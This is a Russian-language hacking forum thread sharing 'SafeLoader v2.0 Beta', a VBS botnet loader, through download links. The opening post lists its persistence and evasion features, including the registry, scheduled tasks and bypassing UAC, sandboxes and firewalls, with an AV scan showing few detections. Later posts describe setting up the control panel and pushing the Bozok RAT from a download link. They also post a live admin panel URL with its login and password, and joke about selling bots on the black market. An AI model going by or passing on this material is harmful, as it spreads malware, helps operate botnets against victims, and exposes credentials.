SafeLoader v2.0 Beta

Тема в разделе "Трояны и шпионские программы", создана пользователем ewwa, 3 апр 2014.

↑ ↓
  1. ewwa Уважаемый пользователь
    ewwa
    Ответить в чате

    Форумчанин

    Регистрация:
    19.02.2014
    Сообщения:
    157
    Симпатии:
    400
    Пол:
    Мужской
    Репа:
    +402 / 0 / -0
    KOkUvIB.
    http://www.sendspace.com/file/e4kahw
    Features:
    -Coded in VBS (Work in All Windows)
    -Anti-Track Panel
    -Easy to Install
    -All Traffic is Encrypted
    -StartUP with Startup Folders
    -StartUP with Regedit
    -Startup with Windows Tasks
    -GeoLocation with GeoIP
    -VBS Downloader and Load in Memory
    -Stable Update
    -Full Uninstall
    -Small Size (8Kb)
    -Easy Cryptable
    -Fuck UAC, SandBox and Firewall
    Fecha del reporte: Wed, 02 Apr 2014 16:35:47 +0000
    Archivo: safe.vbs
    Tamaño: 8934 bytes
    MD5: 37c097c70340a1861401007f30a8365b
    Estado: Infectado
    Detecciones: 2 de 39 (5%)
    Reporte: URL
    [Detecciones]
    AVG - vir.VBS/Worm
    Ad-Aware - Clean
    Ahn Lab V3 Internet Security - Clean
    Arca Vir - Clean
    Avast - Clean
    Avira - Clean
    Bit Defender - Clean
    Bull Guard Internet Security - Clean
    ClamAV - Clean
    Comodo - Clean
    Dr. Web - Clean
    EScan Internet Security Suite 14 - Clean
    Emisoft Anti-Malware (A-Squared) - Clean
    F-Secure - Clean
    Fortinet 5 - Clean
    Fprot - Clean
    Gdata - Clean
    Ikarus - Clean
    Immunet Antivirus - Clean
    K7 Ultimate - Clean
    Kaspersky Internet Security 2014 - Trojan.Script.Suspic.gen
    Mcafee - Clean
    Microsoft Security Essentials - Clean
    NOD32 - Clean
    Nano - Clean
    Norman - Clean
    Norton Internet Security - Clean
    Outpost Security Suite Pro - Clean
    Panda Antivirus - Clean
    Panda Cloud - Clean
    Quick Heal - Clean
    SUPER Anti-Spyware - Clean
    Sophos - Clean
    Total Defense IS - Clean
    Trend Micro - Clean
    Twister Antivirus 8 - Clean
    VBA - Clean
    Vipre Internet Security - Clean
    Virit - Clean
     
    • Мне нравится Мне нравится x 5
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    434
    Пол:
    Мужской
    Репа:
    +970 / 153 / -29
    Jabber:
    Telegram:
    Классная штука !wink1

    А чо боты-то твои ?

    Там кстати на скрине и антивири указаны, у ботов !Dmeh-Smeh-Smeh!!!
     
    • Мне нравится Мне нравится x 4
  3. ewwa Уважаемый пользователь
    ewwa
    Ответить в чате

    Форумчанин

    Регистрация:
    19.02.2014
    Сообщения:
    157
    Симпатии:
    400
    Пол:
    Мужской
    Репа:
    +402 / 0 / -0
    Не не мои, штука свежая от 02.04 один из авторов поделился like it
     
    • Мне нравится Мне нравится x 3
  4. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Решил я заюзать этот ботнет.Закинул файлы на хост,экспортировал sql в базу,внёс изменения в конфиг.В общем стандартная процедура.При переходе на страничку админки выдало внутреннюю ошибку сервера.Причиной этому был файл .htaccess который находился в комплекте с ботнетом и в котором было прописано ограничение по доступу с определённых айпи (большое количество).После его удаления-всё стало работать.
    Сначала запустил сервер-бота на виртуальной семёре.Всё нормально,на панели появилось оповещение.Затем попробовал на XP и восьмёрине и не фига.На панельке показывает,что активна та первая семёра.Кстати НОД никак не реагирует на запуск этого сервера.Потом выставил в настройках панельки загрузку вредоноса и последующий его запуск (Bozok) на компе жертвы.На той виртуалке где стоял НОД,через некоторое время после запуска сервера сработала защита,оповещая о том,что грузится зловред.Проделал те же манипуляции на машине без антивиря-результат нулевой.Ни загрузки ни запуска так и не произошло,хотя на панельке высветилось,что задача выполнена.
    Итог:сейчас у меня пять ,непонятно откуда пришедших бота (в офлайне).Загрузчик показывает,что все загрузки Бозка выполнены,но обратной связи не было.Судя по отсутствию антивирей у ботов,это тоже экспериментальные машины.
    После запуска этого VBS скрипта на другой машине,с другим айпишником всё равно в онлайне моя семёра,что за хрень?
    Вопросы:почему не пашет .htaccess?Почему не запускается зловред который должен грузиться определённого адреса (может причина в Ргхосте)?Что ещё за команды присутствуют в панели управления?
    Логин-пароль и ссылка на админку:
    http://devillevel.hol.es/level1/index.php
    Логин:KarboFoss
    Пасс:ARZXs9V36M90gq7
     
    • Мне нравится Мне нравится x 2
  5. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    434
    Пол:
    Мужской
    Репа:
    +970 / 153 / -29
    Jabber:
    Telegram:
    А ты сам скрипт правил ?

    Код:
    sHost "http://www.website.com/path/gate.php"
    sPassword "DefaultBotPassword"
    sDelay 600000
    Кстати если посмотрите скрипт, его можно открыть в блокноте, то как я понимаю вирус загружается через системную программу wscript.exe !

    Эта программа для запуска скриптов што-ли в винде, короче лично я вообще заблокировал ей выход в сеть фаерволом, мутная программа, но есть в любой винде...NO-no!!!
     
    • Мне нравится Мне нравится x 2
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    434
    Пол:
    Мужской
    Репа:
    +970 / 153 / -29
    Jabber:
    Telegram:
    Там-же блокировка айпишников и больше ничего нет !Не въехал!!!
     
    • Мне нравится Мне нравится x 2
  7. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Естественно.Прописал путь до гейта на моём хосте.Пассворд оставил по умолчанию (как и в конфиге.)

    Вот-вот.Но выскакивает ошибка 500.
     
    • Мне нравится Мне нравится x 2
  8. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    434
    Пол:
    Мужской
    Репа:
    +970 / 153 / -29
    Jabber:
    Telegram:
    А от куда ещё боты взялись ?Отдыхай!!!

    Что-то я так и не понял как его юзать, а ты ссылку на сервер с rghost загружаешь, может нужна прямая ссылка ?

    Может ещё защита в самой винде сработать, UAC или ещё что, поэтому вирус и не запускается, короче фиг знает...
     
    • Мне нравится Мне нравится x 2
  9. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Хрен знает)И они потихоньку добавляются...
    Ссылка прямая,прямо с кнопки закачки на Ргхост(можешь и в панельке глянуть).
    http://rghost.ru/download/54752749/693f75da1621a07a37b4aa348bebdba1c38d97c8/server.exe
    P.S.На том сайте,откуда этот ботнет к нам приплыл пишут,что это бета версия и могут быть различные ошибки.Первая версия SafeLoader (с билдером) была представлена в 2010 году.Даже ссылка ещё не сдохла:
    http://www.sendspace.com/file/k42nb5
     
    • Мне нравится Мне нравится x 2
  10. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    434
    Пол:
    Мужской
    Репа:
    +970 / 153 / -29
    Jabber:
    Telegram:
    Уже восемь ботов !Dmeh-Smeh-Smeh!!!
    Таак, ща насобираем и продадим на чёрном рынке...big010101
     
    • Мне нравится Мне нравится x 2
Похожие темы:
  1. antibiotik
    Ответов:
    4
    Просмотров:
    1.667
  2. Anubis
    Ответов:
    7
    Просмотров:
    1.420
  3. Anubis
    Ответов:
    9
    Просмотров:
    2.347
Загрузка...

Поделиться этой страницей